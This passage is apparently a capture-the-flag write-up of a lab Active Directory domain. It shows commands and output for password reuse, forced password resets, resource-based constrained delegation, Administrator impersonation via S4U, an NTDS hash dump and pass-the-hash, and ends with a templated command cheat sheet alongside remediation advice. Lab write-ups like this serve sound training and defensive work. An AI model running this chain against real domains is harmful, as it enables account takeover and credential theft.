2026/07/08 01:00:11 > [+] VALID LOGIN: svc_sspr@phantom.vl:gB6XTcqVP5MlP7Rc
2026/07/08 01:00:14 > Done! Tested 30 logins (1 successes) in 5.370 seconds
The router-config password was actually reused on the svc_sspr service account - a classic case of the same password being recycled across unrelated systems.
Foothold
nxc smb phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
nxc ldap phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
LDAP MACHINE-IP 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert)
LDAP MACHINE-IP 389 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
nxc winrm phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
WINRM MACHINE-IP 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl)
WINRM MACHINE-IP 5985 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc (Pwn3d!)
WinRM is open — full interactive shell:
evil-winrm -i dc.phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_sspr\Documents> whoami
phantom\svc_sspr
*Evil-WinRM* PS C:\Users\svc_sspr\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> ls
Directory: C:\Users\svc_sspr\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/7/2026 9:38 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> type user.txt
[REDACTED]
user.txt captured.
7. Privilege Escalation Path - BloodHound
With svc_sspr creds, the BloodHound graph makes the rest of the path obvious.
svc_sspr → ForceChangePassword → three users: rnichols, wsilva, crose. Given the account's role ("SSPR" = self-service password reset), this is a designed capability that's over-permissioned - it lets svc_sspr reset any of these three users' passwords with no knowledge of the old one:
-
SVC_SSPR@PHANTOM.VL- Password Never Expires:TRUE, Outbound Object Control: 3 (→CROSE,RNICHOLS,WSILVA, each viaForceChangePassword).
rnichols → MemberOf → ICT Security (group) → AddAllowedToAct → DC.PHANTOM.VL. That group has rights to write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the DC's computer object — i.e., members can configure Resource-Based Constrained Delegation (RBCD) onto the domain controller itself:
-
RNICHOLS@PHANTOM.VL— MemberOfICT SECURITY@PHANTOM...→AddAllowedToAct→DC.PHANTOM.VL.
Chained together: svc_sspr → reset a delegatable user's password → that user configures RBCD on DC$ → that user impersonates any principal (including Administrator) against the DC via S4U2Proxy → domain compromise.
8. Exploiting ForceChangePassword → RBCD → Domain Admin
8.1 Abuse ForceChangePassword
bloodyad --host phantom.vl -d phantom.vl -u svc_sspr -p 'gB6XTcqVP5MlP7Rc' \
set password rnichols 'Pwned123!'
[+] Password changed successfully!
Also demonstrated the same primitive via impacket against wsilva, confirming svc_sspr has the same right over each target:
impacket-changepasswd phantom.vl/wsilva@MACHINE-IP -newpass 'Pwned123!' -altuser svc_sspr -altpass 'gB6XTcqVP5MlP7Rc' -reset
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Setting the password of phantom.vl\wsilva as phantom.vl\svc_sspr
[*] Connecting to DCE/RPC as phantom.vl\svc_sspr
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
Confirmed both new passwords work:
nxc smb phantom.vl -u rnichols -p 'Pwned123!'
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\rnichols:Pwned123!
nxc smb phantom.vl -u wsilva -p 'Pwned123!'
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\wsilva:Pwned123!
8.2 Configure RBCD
rnichols's ICT Security membership grants write access to configure delegation on the DC's computer object. Normally RBCD from a "clean" attacker path involves creating a fake computer account to act as the delegating principal, but here the MachineAccountQuota is 0 (no new computer objects can be created), so instead of a rogue-computer RBCD, delegation is configured directly for the existing rnichols user account, since it already has the necessary AddAllowedToAct right.
Reference used: confirmed this technique - configuring RBCD directly on a controllable user account instead of a new computer object when MAQ=0 - via The Hacker Recipes: RBCD on SPN-less users. This was found specifically while researching "RBCD from a normal user when Machine Account Quota is zero."
impacket-rbcd -delegate-from 'rnichols' -delegate-to 'DC$' -dc-ip MACHINE-IP -action write phantom.vl/rnichols:'Pwned123!'
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] rnichols can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] rnichols (S-1-5-21-4029599044-1972224926-2225194048-1112)
rnichols is now written into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute - able to impersonate users against the DC via S4U2Proxy.
8.3 Getting Reliable Kerberos Key Material
Grabbed a TGT for rnichols and tried to inspect the ticket directly:
impacket-getTGT phantom.vl/rnichols:'Pwned123!'
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in rnichols.ccache
export KRB5CCNAME=rnichols.ccache
klist
Ticket cache: FILE:rnichols.ccache
Default principal: rnichols@PHANTOM.VL
Valid starting Expires Service principal
07/08/2026 01:22:13 07/08/2026 11:22:13 krbtgt/PHANTOM.VL@PHANTOM.VL
renew until 07/09/2026 01:22:12
impacket-describeTicket rnichols.ccache
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : 58912a8ce7bbc3e7c56bbc2fa5c325c12cdf9214987e244b6e891d54e507dd1a
[*] User Name : rnichols
[*] User Realm : PHANTOM.VL
[*] Service Name : krbtgt/PHANTOM.VL
[*] Service Realm : PHANTOM.VL
[*] Start Time : 08/07/2026 01:22:13 AM
[*] End Time : 08/07/2026 11:22:13 AM
[*] RenewTill : 09/07/2026 01:22:12 AM
[*] Flags : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType : aes256_cts_hmac_sha1_96
[*] Base64(key) : WJEqjOe7w+fFa7wvpcMlwSzfkhSYfiRLbokdVOUH3Ro=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : krbtgt/PHANTOM.VL
[*] Service Realm : PHANTOM.VL
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
describeTicket needs the account's actual key material to fully decode/verify a ticket — a password-based TGT alone in the ccache isn't enough on its own for that step. The reliable way around this is to set a known NT hash on the delegating account directly, so the exact same hash can be fed into every subsequent tool without any ambiguity about what key material is in play:
pypykatz crypto nt 'Pwned123!'
37d7a42022f4c0bc1efdc5d9c0d5eb33
8.4 Repeating Cleanly on crose
Rather than keep working on top of rnichols (which already had its RBCD trust and Kerberos state touched a few times above), the same chain was repeated end-to-end on the second delegatable account, crose, entering the known NT hash from the very start:
impacket-changepasswd phantom.vl/crose@MACHINE-IP -newpass 'Pwned123!' -altuser svc_sspr -altpass 'gB6XTcqVP5MlP7Rc' -reset
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Setting the password of phantom.vl\crose as phantom.vl\svc_sspr
[*] Connecting to DCE/RPC as phantom.vl\svc_sspr
[*] Password was changed successfully.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip MACHINE-IP -action write phantom.vl/crose:'Pwned123!'
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[*] rnichols (S-1-5-21-4029599044-1972224926-2225194048-1112)
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] crose (S-1-5-21-4029599044-1972224926-2225194048-1126)
crose is now added to the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute alongside rnichols — both can impersonate users against the DC.
pypykatz crypto nt 'Pwned123!'
37d7a42022f4c0bc1efdc5d9c0d5eb33
impacket-changepasswd -newhashes :37d7a42022f4c0bc1efdc5d9c0d5eb33 phantom.vl/crose@MACHINE-IP
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
Current password:
[*] Changing the password of phantom.vl\crose
[*] Connecting to DCE/RPC as phantom.vl\crose
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
impacket-getTGT phantom.vl/crose -hashes :37d7a42022f4c0bc1efdc5d9c0d5eb33
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in crose.ccache
impacket-describeTicket crose.ccache
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : f325e024f5b7299d3f8b2c2d2c4d4709
[*] User Name : crose
[*] User Realm : PHANTOM.VL
[*] Service Name : krbtgt/PHANTOM.VL
[*] Service Realm : PHANTOM.VL
[*] Start Time : 08/07/2026 01:52:00 AM
[*] End Time : 08/07/2026 11:52:00 AM
[*] RenewTill : 09/07/2026 01:51:59 AM
[*] Flags : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType : rc4_hmac
[*] Base64(key) : 8yXgJPW3KZ0/iywtLE1HCQ==
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : krbtgt/PHANTOM.VL
[*] Service Realm : PHANTOM.VL
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
describeTicket still can't locally decode the outer krbtgt ticket (that part is encrypted with the KDC's own key, which is expected - a client is never supposed to be able to decrypt that layer). What matters is that the ccache now carries a well-defined RC4/NT-hash-derived session key, which is exactly what the next step needs to complete the S4U exchange correctly.
8.5 S4U2Self + U2U → S4U2Proxy → Impersonate Administrator
export KRB5CCNAME=crose.ccache
impacket-getST -u2u -impersonate Administrator -spn cifs/dc.phantom.vl phantom.vl/crose -k -no-pass
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
This uses crose's Kerberos ticket, the RBCD trust configured on DC$, and User-to-User (U2U) authentication to request a service ticket as Administrator for cifs/dc.phantom.vl - full impersonation despite crose having no admin rights of its own.
export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
klist
Ticket cache: FILE:Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
Default principal: Administrator@phantom.vl
Valid starting Expires Service principal
07/08/2026 01:55:48 07/08/2026 11:52:00 cifs/dc.phantom.vl@PHANTOM.VL
renew until 07/09/2026 01:51:59
8.6 Shell as Administrator
impacket-wmiexec -k -no-pass phantom.vl/administrator@dc.phantom.vl
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
Volume in drive C has no label.
Volume Serial Number is BAA2-45C4
Directory of C:\
07/06/2024 09:25 AM <DIR> Departments Share
04/15/2025 06:21 AM <DIR> inetpub
05/08/2021 01:20 AM <DIR> PerfLogs
08/14/2025 04:55 AM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
07/11/2024 08:03 AM <DIR> Public
07/06/2024 11:40 AM <DIR> Users
07/07/2026 10:57 PM <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 6,875,144,192 bytes free
C:\>cd Users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is BAA2-45C4
Directory of C:\Users
07/06/2024 11:40 AM <DIR> .
07/06/2024 11:55 AM <DIR> Administrator
07/03/2024 03:18 AM <DIR> Public
07/06/2024 11:40 AM <DIR> svc_sspr
0 File(s) 0 bytes
4 Dir(s) 6,875,144,192 bytes free
C:\Users>cd Administrator/Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is BAA2-45C4
Directory of C:\Users\Administrator\Desktop
07/06/2024 11:55 AM <DIR> .
07/06/2024 11:55 AM <DIR> ..
07/04/2024 07:22 AM 2,308 Microsoft Edge.lnk
07/07/2026 09:38 AM 34 root.txt
2 File(s) 2,342 bytes
2 Dir(s) 6,875,144,192 bytes free
C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
root.txt captured - Domain Admin achieved.
9. Post-Exploitation - NTDS Dump
With the Administrator Kerberos ticket cached, dumped the full NTDS database:
nxc smb phantom.vl --use-kcache --ntds --user Administrator
SMB phantom.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB phantom.vl 445 DC [+] phantom.vl\Administrator from ccache (Pwn3d!)
SMB phantom.vl 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB phantom.vl 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa2a(snip)2117:::
SMB phantom.vl 445 DC [+] Dumped 1 NTDS hashes to /root/.nxc/logs/ntds/DC_phantom.vl_2026-07-08_015951.ntds of which 1 were added to the database
SMB phantom.vl 445 DC [*] To extract only enabled accounts from the output file, run the following command:
SMB phantom.vl 445 DC [*] grep -iv disabled /root/.nxc/logs/ntds/DC_phantom.vl_2026-07-08_015951.ntds | cut -d ':' -f1
Confirmed pass-the-hash works directly too:
evil-winrm -i MACHINE-IP -u Administrator -H aa2a(snip)12117
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
phantom\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/4/2024 7:22 AM 2308 Microsoft Edge.lnk
-ar--- 7/7/2026 9:38 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
Full domain compromise confirmed via two independent paths (Kerberos delegation abuse and NTLM pass-the-hash).
Key Vulnerabilities & Attack Chain Summary
Root causes exploited:
-
Guest/anonymous SMB access to file shares exposing internal documents (
Public, laterDepartments Share). -
Hardcoded default password in an onboarding email template, never rotated by at least one employee (
ibryant). -
Encrypted backup container reachable and downloadable by a low-privileged domain user, cracked offline due to a weak/guessable VeraCrypt passphrase (
Phantom2023!). -
Plaintext password stored in a network device configuration backup (VyOS
config.boot, SSTP VPN local user). -
Password reuse between the VPN/router credential and a privileged-by-function AD service account (
svc_sspr). -
Over-permissioned service account:
svc_sspr(meant for self-service password reset) holdsForceChangePasswordover multiple standard user accounts with no additional verification. -
Excessive delegation rights on a security-named group (
ICT Security) grantingAddAllowedToActon the Domain Controller computer object — enabling Resource-Based Constrained Delegation abuse straight to the DC. - MachineAccountQuota = 0 did not fully mitigate RBCD, since an existing controllable user account (no new computer object needed) could still be used as the delegation principal.
Attack chain (condensed):
Guest SMB → Public share → onboarding PDF → default password "Ph4nt0m@5t4rt!"
→ password spray → ibryant (domain user)
→ Departments Share (IT/) → VeraCrypt container (IT_BACKUP_201123.hc)
→ hashcat crack ("Phantom2023!") → mount → vyos_backup.tar.gz
→ config.boot → plaintext SSTP VPN password "gB6XTcqVP5MlP7Rc" (lstanley)
→ password reuse / spray → svc_sspr (WinRM) → user.txt
→ BloodHound: svc_sspr –ForceChangePassword→ rnichols/wsilva/crose
rnichols/crose –MemberOf→ ICT Security –AddAllowedToAct→ DC$
→ reset crose's password/hash via svc_sspr (ForceChangePassword)
→ configure RBCD (crose → DC$)
→ S4U2Self+U2U / S4U2Proxy, impersonate Administrator
→ wmiexec as Administrator → root.txt
→ NTDS dump → Administrator NTLM hash → pass-the-hash confirmed
Remediation recommendations:
- Disable guest/anonymous SMB access; enforce least-privilege share ACLs.
- Never embed real credentials in onboarding templates; enforce mandatory password change at first logon.
- Store encrypted backups outside of general-access file shares; use strong, randomly generated passphrases for VeraCrypt/backup encryption.
- Strip or encrypt credentials in exported network device configuration backups; treat config backups as tier-0 sensitive material.
- Enforce unique passwords per system/account — no reuse between network infrastructure and AD service accounts.
- Scope
ForceChangePasswordand similar delegated AD rights as narrowly as possible; audit any account with password-reset rights over other principals. - Restrict
GenericWrite/AddAllowedToAct-equivalent rights on Domain Controller computer objects to Domain Admins/Tier-0 only; audit custom groups (likeICT Security) for accidental over-delegation. - Monitor for RBCD attribute changes (
msDS-AllowedToActOnBehalfOfOtherIdentity) and S4U2Proxy usage via Kerberos event logging (Event ID 4769 with delegation flags).
Appendix: Credentials & Secrets Found
| Account / Source | Secret | Notes |
|---|---|---|
| Default onboarding template | Ph4nt0m@5t4rt! |
Sprayed → ibryant
|
VeraCrypt container (IT_BACKUP_201123.hc) |
Phantom2023! |
Cracked via hashcat mode 13721 |
VyOS config.boot (SSTP local user lstanley) |
gB6XTcqVP5MlP7Rc |
Reused as svc_sspr's AD password |
svc_sspr |
gB6XTcqVP5MlP7Rc |
WinRM foothold, user.txt
|
rnichols (reset) |
Pwned123! |
ForceChangePassword abuse; RBCD initially configured here |
wsilva (reset, demo only) |
Pwned123! |
Confirmed ForceChangePassword works; not used further |
crose (reset, then set to known hash) |
Pwned123! → NT hash 37d7a42022f4c0bc1efdc5d9c0d5eb33
|
Used for the working RBCD/S4U2Proxy path |
| Administrator | NT hash aa2(snip)117
|
From NTDS dump; pass-the-hash confirmed |
user.txt |
[REDACTED] |
C:\Users\svc_sspr\Desktop\user.txt |
root.txt |
[REDACTED] |
C:\Users\Administrator\Desktop\root.txt |
Appendix: Useful Commands Reference
# Guest share/RID enum
nxc smb <ip> -u 'guest' -p '' --shares
nxc smb <ip> -u 'guest' -p '' --rid-brute
# eml → pdf attachment
munpack tech_support_email.eml
# Password spray
kerbrute passwordspray -d <domain> --dc <dc> users.txt '<password>'
# LDAP groups / BloodHound
nxc ldap <domain> -u <user> -p '<pass>' --groups
nxc ldap <domain> -u <user> -p '<pass>' --groups "<GroupName>"
bloodhound-python -u <user> -p '<pass>' -d <domain> -dc <dc> -ns <ip> -c All --zip
# Crack VeraCrypt container
hashcat -m 13721 container.hc wordlist.txt --force
veracrypt container.hc /mnt/ --password='<cracked pw>'
# Abuse ForceChangePassword
bloodyad --host <dc> -d <domain> -u <user> -p '<pass>' set password <target> '<newpass>'
impacket-changepasswd <domain>/<target>@<ip> -newpass '<newpass>' -altuser <attacker> -altpass '<pass>' -reset
# Configure RBCD (MAQ=0, no new computer object needed)
impacket-rbcd -delegate-from '<user>' -delegate-to '<TargetComputer>$' -dc-ip <ip> -action write <domain>/<user>:'<pass>'
# Set a known NT hash directly (for reliable Kerberos key material)
impacket-changepasswd -newhashes :<NTHASH> <domain>/<user>@<ip>
impacket-getTGT <domain>/<user> -hashes :<NTHASH>
# S4U2Self+U2U / S4U2Proxy impersonation
impacket-getST -u2u -impersonate Administrator -spn cifs/<dc-fqdn> <domain>/<user> -k -no-pass
impacket-wmiexec -k -no-pass <domain>/administrator@<dc-fqdn>
# NTDS dump via cached Kerberos ticket
nxc smb <domain> --use-kcache --ntds --user Administrator
# Pass-the-hash
evil-winrm -i <ip> -u Administrator -H <NTHASH>
Top comments (0)